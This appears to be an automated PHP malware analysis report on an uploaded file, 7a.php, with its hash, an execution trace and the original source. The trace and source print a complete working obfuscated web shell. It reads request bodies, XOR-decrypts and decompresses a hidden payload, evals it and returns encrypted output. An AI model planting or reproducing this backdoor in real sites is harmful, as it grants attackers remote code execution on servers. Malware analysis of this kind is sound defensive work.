7a.php

md5: 5dd5851fb4118e02126b99711194e69a

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Traces)
base64_encode (Traces)

Execution
eval (Traces)

Files
file_get_contents (Traces)

Input
php:\/\/input (Traces)

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
data/traces/5dd5851fb4118e02126b99711194e69a_trace-1676240481.2793.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:21:47.177148]
1	0	1	0.000130	393464
1	3	0	0.000190	396424	{main}	1		/var/www/html/uploads/7a.php	0	0
1		A						/var/www/html/uploads/7a.php	2	$E = '#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV'
2	4	0	0.000225	396424	str_replace	0		/var/www/html/uploads/7a.php	3	3	'LG'	''	'LGcreaLGteLG_LGfuLGncLGtion'
2	4	1	0.000242	396560
2	4	R			'create_function'
1		A						/var/www/html/uploads/7a.php	3	$S = 'create_function'
1		A						/var/www/html/uploads/7a.php	4	$l = 's("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V'
1		A						/var/www/html/uploads/7a.php	5	$D = '$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#B'
1		A						/var/www/html/uploads/7a.php	6	$n = '{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#content'
1		A						/var/www/html/uploads/7a.php	7	$b = 'gWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for'
1		A						/var/www/html/uploads/7a.php	8	$g = '#ean();$r=@bV#ase64_eV#nV#code(@x(@V#gzcV#omV#press($o),$V#k));print("$pV#$khV#$r$kf");}'
1		A						/var/www/html/uploads/7a.php	9	$U = '($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k'
2	5	0	0.000357	397104	str_replace	0		/var/www/html/uploads/7a.php	10	3	'V#'	''	'$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#BgWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#contents("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV#ean();'
2	5	1	0.000393	397712
2	5	R			'$k="827ccb0e";$kh="ea8a706c4c34";$kf="a16891f84e7b";$p="hqUDnUDlYBgWvvWN";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/7a.php	10	$t = '$k="827ccb0e";$kh="ea8a706c4c34";$kf="a16891f84e7b";$p="hqUDnUDlYBgWvvWN";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000450	396976	create_function	0		/var/www/html/uploads/7a.php	11	2	''	'$k="827ccb0e";$kh="ea8a706c4c34";$kf="a16891f84e7b";$p="hqUDnUDlYBgWvvWN";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000530	405016	{internal eval}	1		/var/www/html/uploads/7a.php	11	0
3	7	1	0.000544	405016
3	7	R			NULL
2	6	1	0.000559	403648
2	6	R			'\000lambda_1'
1		A						/var/www/html/uploads/7a.php	11	$z = '\000lambda_1'
2	8	0	0.000586	403584	__lambda_func	1		/var/www/html/uploads/7a.php	11	0
2		A						/var/www/html/uploads/7a.php(11) : runtime-created function	1	$k = '827ccb0e'
2		A						/var/www/html/uploads/7a.php(11) : runtime-created function	1	$kh = 'ea8a706c4c34'
2		A						/var/www/html/uploads/7a.php(11) : runtime-created function	1	$kf = 'a16891f84e7b'
2		A						/var/www/html/uploads/7a.php(11) : runtime-created function	1	$p = 'hqUDnUDlYBgWvvWN'
3	9	0	0.000646	403640	file_get_contents	0		/var/www/html/uploads/7a.php(11) : runtime-created function	1	1	'php://input'
3	9	1	0.000666	404376
3	9	R			''
3	10	0	0.000680	404360	preg_match	0		/var/www/html/uploads/7a.php(11) : runtime-created function	1	3	'/ea8a706c4c34(.+)a16891f84e7b/'	''	NULL
3	10	1	0.000727	404520
3	10	R			0
2	8	1	0.000742	404280
1	3	1	0.000749	404280
			0.000773	321696
TRACE END   [2023-02-12 20:21:47.177817]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php
$E='#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV';
$S=str_replace('LG','','LGcreaLGteLG_LGfuLGncLGtion');
$l='s("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V';
$D='$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#B';
$n='{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#content';
$b='gWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for';
$g='#ean();$r=@bV#ase64_eV#nV#code(@x(@V#gzcV#omV#press($o),$V#k));print("$pV#$khV#$r$kf");}';
$U='($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k';
$t=str_replace('V#','',$D.$b.$U.$n.$l.$E.$g);
$z=$S('',$t);$z();
?>
PHP Malware Analysis

7a.php

md5: 5dd5851fb4118e02126b99711194e69a

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
